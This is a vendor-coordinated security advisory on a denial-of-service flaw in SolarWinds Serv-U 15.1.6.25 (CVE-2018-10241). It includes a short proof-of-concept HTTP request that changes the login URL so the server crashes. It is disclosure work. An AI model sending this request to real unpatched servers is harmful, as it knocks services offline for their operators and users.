SolarWinds Serv-U Managed File Transfer – Denial of Service

Medium Risk Advisory Featured

Share

Reported Date

January 8, 2018 

Vendor

SolarWinds

Systems Affected

Serv-U 15.1.6.25

Summary

A denial-of-service vulnerability in SolarWinds Serv-U 15.1.6.25 allows an authenticated user to crash the application (with a NULL pointer dereference) via a specially crafted URL beginning with the /Web%20Client/ substring.

Vendor Status

The vendor has been notified of this vulnerability, and has patched the software as of version 15.1.6 HFv1.

Exploit Availability

An authenticated user can request a specially crafted URL from the Serv-U MFT server that will result in a null pointer dereference. By changing the Login.xml string in the URL of an authentication request to an arbitrary value, an attacker can cause the application to crash. An ordinary login request is shown below:

POST /Web%20Client/Login.xml?Command=Login&Sync=1514397954014 HTTP/1.1

Host: 127.0.0.1

Connection: close

…omitted for brevity…

Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS

user=testuser&pword=password&viewshare=&language=en%2CUS&

In this proof of concept, Login.xml was replaced with the string crash, as pictured below:

POST /Web%20Client/crash?Command=Login&Sync=1514397954014 HTTP/1.1

Host: 127.0.0.1

Connection: close

Content-Length: 59

…omitted for brevity…

Cookie: multitransbubbletip=false; multitrans=0; SURememberMe=true; SUUserId=testuser2; killmenothing; SULang=en%2CUS

user=testuser&pword=password&viewshare=&language=en%2CUS&

The Serv-U tray immediately displayed a pop-up notification stating that the Serv-U MFT server was offline. Shortly thereafter, an error message was displayed within the Serv-U Management Console, as seen below:

 

Advisory for SolarWinds vulnerability discovered by Baker Hamilton of Bishop Fox. Vendor has since remediated..
FIGURE 1 - Error produced in Serv-U Management Console after sending the malicious payload

 

The Management Console was otherwise unresponsive, and the Serv-U MFT server had to be manually restarted following this crash.

Researcher

Baker Hamilton, MD, MMSc of Bishop Fox 

For Reference

CVE-2018-10241

National Vulnerability Database Write-Up


Default fox headshot blue

About the author, Baker Hamilton

Contractor

Baker Hamilton, MD, MMSc (OSCE, OSCP) is a Bishop Fox alumnus who focused on application penetration testing, internal and external network penetration testing, source code review, and red teaming.

More by Baker

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.